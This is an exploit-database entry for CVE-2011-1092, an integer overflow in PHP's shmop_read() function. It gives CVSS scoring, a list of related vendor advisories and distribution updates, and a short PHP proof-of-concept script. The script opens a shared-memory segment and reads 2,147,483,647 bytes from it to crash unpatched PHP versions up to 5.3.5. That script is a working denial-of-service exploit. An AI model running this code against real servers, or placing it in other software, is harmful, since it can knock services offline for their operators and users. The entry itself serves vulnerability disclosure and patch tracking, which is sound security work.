Lucene search
Jose Carlos NorteEXPLOITPACK:73762C9D0D011D0F7F7CAA1D670C463FHistoryMar 12, 2011 - 12:00 a.m.
PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service
2011-03-1200:00:00
Jose Carlos Norte
31
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service
<?php
# Exploit Title: PHP <=5.3.5 Integer Overflow DoS
# Date: 12-03-11
# Author: Jose Carlos Norte - www.rooibo.com
# Software Link: www.php.net
# Version: <= 5.3.5
# Tested on: Ubuntu Linux
# CVE : CVE-2011-1092
$shm_key = ftok(__FILE__, 't');
$shm_id = shmop_open($shm_key, "c", 0644, 100);
$shm_data = shmop_read($shm_id, 1, 2147483647);
//if there is no segmentation fault past this point, we have 2gb of memory!
//or we are in a patched php
echo "this php version is not vulnerable!";
?>Related
prion
prion
Integer overflow
2011-03-15 17:55:00
ubuntucve
ubuntucve
CVE-2011-1092
2011-03-15 00:00:00
openvas
openvas
PHP 'shmop_read()' Remote Integer Overflow Vulnerability
2011-03-09 00:00:00
Fedora Update for php FEDORA-2011-3666
2011-04-11 00:00:00
Fedora Update for maniadrive FEDORA-2011-3636
2011-04-11 00:00:00
cve
cve
CVE-2011-1092
2011-03-15 17:55:00
seebug
seebug
PHP <= 5.3.6 shmop_read() Integer Overflow DoS
2014-07-01 00:00:00
exploitdb
exploitdb
PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service
2011-03-12 00:00:00
thn
thn
PHP 5.3.6 closes five security holes !
2011-03-17 18:09:00
fedora
fedora
[SECURITY] Fedora 13 Update: php-eaccelerator-0.9.6.1-6.fc13
2011-04-06 22:34:24
[SECURITY] Fedora 13 Update: php-5.3.6-1.fc13
2011-04-06 22:34:24
[SECURITY] Fedora 14 Update: php-5.3.6-1.fc14
2011-04-06 22:33:56
nessus
nessus
PHP 5.3.x < 5.3.6 Multiple Vulnerabilities
2011-03-18 00:00:00
Fedora 15 : maniadrive-1.2-29.fc15 / php-5.3.6-1.fc15 / php-eaccelerator-0.9.6.1-6.fc15 (2011-3614)
2011-03-27 00:00:00
PHP 5.3 < 5.3.6 String To Double Conversion DoS
2011-03-18 00:00:00
osv
osv
php5 - several
2012-02-13 00:00:00
debian
debian
[SECURITY] [DSA 2408-1] php5 security update
2012-02-13 18:15:24
ubuntu
ubuntu
PHP vulnerabilities
2011-04-29 00:00:00
PHP Regressions
2011-05-05 00:00:00
securityvulns
securityvulns
[USN-1126-1] PHP vulnerabilities
2011-05-01 00:00:00
PHP multiple security vulnerabilities
2011-05-01 00:00:00
[ GLSA 201110-06 ] PHP: Multiple vulnerabilities
2011-10-12 00:00:00
f5
f5
Multiple PHP vulnerabilities
2012-04-05 02:07:00
SOL13518 - Multiple PHP vulnerabilities
2012-04-04 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for EXPLOITPACK:73762C9D0D011D0F7F7CAA1D670C463F